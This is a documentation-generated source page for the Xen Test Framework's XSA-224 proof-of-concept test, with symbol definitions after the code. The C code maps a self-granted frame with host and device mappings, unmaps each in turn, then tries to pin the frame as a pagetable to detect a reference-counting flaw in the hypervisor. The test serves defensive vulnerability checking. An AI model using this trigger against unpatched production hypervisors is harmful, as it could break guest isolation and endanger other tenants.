Xen Test Framework
tests
xsa-224
main.c
Go to the documentation of this file.
1
19
#include <xtf.h>
20
21
const
char
test_title
[] =
"XSA-224 PoC"
;
22
23
static
uint8_t
frame
[
PAGE_SIZE
]
__page_aligned_bss
;
24
25
void
test_main
(
void
)
26
{
27
int
rc =
xtf_init_grant_table
(1);
28
29
if
( rc )
30
return
xtf_error
(
"Error initialising grant table: %d\n"
, rc);
31
32
int
domid =
xtf_get_domid
();
33
34
if
( domid < 0 )
35
return
xtf_error
(
"Error getting domid\n"
);
36
37
/*
38
* Construct gref 8 to allow frame[] to be mapped by outselves.
39
*/
40
gnttab_v1
[8].
domid
= domid;
41
gnttab_v1
[8].
frame
=
virt_to_gfn
(
frame
);
42
smp_wmb
();
43
gnttab_v1
[8].
flags
=
GTF_permit_access
;
44
45
struct
gnttab_map_grant_ref
map = {
46
.
host_addr
=
KB
(4),
47
.flags =
GNTMAP_host_map
|
GNTMAP_device_map
,
48
.ref = 8,
49
.dom = domid,
50
.dev_bus_addr =
KB
(4),
51
};
52
53
/*
54
* Map frame[] to ourselves with both host and device mappings.
55
*/
56
rc =
hypercall_grant_table_op
(
GNTTABOP_map_grant_ref
, &map, 1);
57
if
( rc || map.
status
)
58
return
xtf_error
(
"Error: Unable to map grant[8]: %d/%d\n"
,
59
rc, map.
status
);
60
61
struct
gnttab_unmap_grant_ref
unmap = {
62
.
host_addr
=
KB
(4),
63
.handle = map.
handle
,
64
};
65
66
/*
67
* Unmap the host mapping of frame[] in isolation.
68
*/
69
rc =
hypercall_grant_table_op
(
GNTTABOP_unmap_grant_ref
, &unmap, 1);
70
if
( rc || unmap.
status
)
71
return
xtf_error
(
"Error: Unable to host unmap grant[8]: %d/%d\n"
,
72
rc, unmap.
status
);
73
74
/*
75
* Unmap the device mapping of frame[] in isolation.
76
*/
77
unmap.
host_addr
= 0;
78
unmap.
dev_bus_addr
=
virt_to_maddr
(
frame
);
79
80
rc =
hypercall_grant_table_op
(
GNTTABOP_unmap_grant_ref
, &unmap, 1);
81
if
( rc || unmap.
status
)
82
return
xtf_error
(
"Error: Unable to bus unmap grant[8]: %d/%d\n"
,
83
rc, unmap.
status
);
84
85
/*
86
* At this point, if Xen is vulnerable to XSA-224, it will have dropped
87
* one too many writeable refs from frame[]. Check, by trying to pin it
88
* as a pagetable.
89
*/
90
mmuext_op_t
op =
91
{
92
.
cmd
=
MMUEXT_PIN_L1_TABLE
,
93
.arg1.mfn =
virt_to_mfn
(
frame
),
94
};
95
96
rc =
hypercall_mmuext_op
(&op, 1,
NULL
,
DOMID_SELF
);
97
98
switch
( rc )
99
{
100
case
0:
101
return
xtf_failure
(
"Fail: Vulnerable to XSA-224\n"
);
102
103
case
-
EINVAL
:
104
return
xtf_success
(
"Success: Not vulnerable to XSA-224\n"
);
105
106
default
:
107
return
xtf_error
(
"Unexpected MMUEXT_PIN_L1_TABLE rc %d\n"
, rc);
108
}
109
}
110
111
/*
112
* Local variables:
113
* mode: C
114
* c-file-style: "BSD"
115
* c-basic-offset: 4
116
* tab-width: 4
117
* indent-tabs-mode: nil
118
* End:
119
*/
smp_wmb
#define smp_wmb()
Definition:
barrier.h:36
gnttab_v1
grant_entry_v1_t gnttab_v1[]
xtf_init_grant_table
int xtf_init_grant_table(unsigned int version)
Initialise XTF's grant infrastructure.
Definition:
grant_table.c:21
__page_aligned_bss
#define __page_aligned_bss
Definition:
compiler.h:37
test_main
void test_main(void)
To be implemented by each test, as its entry point.
Definition:
main.c:110
test_title
const char test_title[]
The title of the test.
Definition:
main.c:24
EINVAL
#define EINVAL
Definition:
errno.h:33
hypercall_mmuext_op
static long hypercall_mmuext_op(const mmuext_op_t ops[], unsigned int count, unsigned int *done, unsigned int foreigndom)
Definition:
hypercall.h:148
hypercall_grant_table_op
static long hypercall_grant_table_op(unsigned int cmd, void *args, unsigned int count)
Definition:
hypercall.h:131
xtf_get_domid
int xtf_get_domid(void)
Obtain the current domid.
Definition:
lib.c:47
virt_to_mfn
unsigned long virt_to_mfn(const void *va)
virt_to_maddr
uint64_t virt_to_maddr(const void *va)
virt_to_gfn
static unsigned long virt_to_gfn(const void *va)
Definition:
mm.h:100
KB
#define KB(num)
Express num in Kilobytes.
Definition:
numbers.h:23
PAGE_SIZE
#define PAGE_SIZE
Definition:
page.h:11
xtf_failure
void xtf_failure(const char *fmt,...)
Report a test failure.
Definition:
report.c:94
xtf_error
void xtf_error(const char *fmt,...)
Report a test error.
Definition:
report.c:80
xtf_success
void xtf_success(const char *fmt,...)
Report test success.
Definition:
report.c:38
NULL
#define NULL
Definition:
stddef.h:12
uint8_t
__UINT8_TYPE__ uint8_t
Definition:
stdint.h:14
gnttab_map_grant_ref
Definition:
grant_table.h:224
gnttab_map_grant_ref::status
int16_t status
Definition:
grant_table.h:231
gnttab_map_grant_ref::handle
grant_handle_t handle
Definition:
grant_table.h:232
gnttab_map_grant_ref::host_addr
uint64_t host_addr
Definition:
grant_table.h:226
gnttab_unmap_grant_ref
Definition:
grant_table.h:248
gnttab_unmap_grant_ref::status
int16_t status
Definition:
grant_table.h:254
gnttab_unmap_grant_ref::host_addr
uint64_t host_addr
Definition:
grant_table.h:250
gnttab_unmap_grant_ref::dev_bus_addr
uint64_t dev_bus_addr
Definition:
grant_table.h:251
grant_entry_v1_t::flags
uint16_t flags
Definition:
grant_table.h:108
grant_entry_v1_t::frame
uint32_t frame
Definition:
grant_table.h:117
grant_entry_v1_t::domid
domid_t domid
Definition:
grant_table.h:110
mmuext_op
Definition:
xen.h:355
mmuext_op::cmd
unsigned int cmd
Definition:
xen.h:356
GNTTABOP_map_grant_ref
#define GNTTABOP_map_grant_ref
Definition:
grant_table.h:223
GNTMAP_host_map
#define GNTMAP_host_map
Definition:
grant_table.h:179
GNTMAP_device_map
#define GNTMAP_device_map
Definition:
grant_table.h:176
GTF_permit_access
#define GTF_permit_access
Definition:
grant_table.h:50
GNTTABOP_unmap_grant_ref
#define GNTTABOP_unmap_grant_ref
Definition:
grant_table.h:247
MMUEXT_PIN_L1_TABLE
#define MMUEXT_PIN_L1_TABLE
Definition:
xen.h:333
DOMID_SELF
#define DOMID_SELF
Definition:
xen.h:70
frame
static uint8_t frame[PAGE_SIZE]
Definition:
main.c:23
Generated by
1.9.4
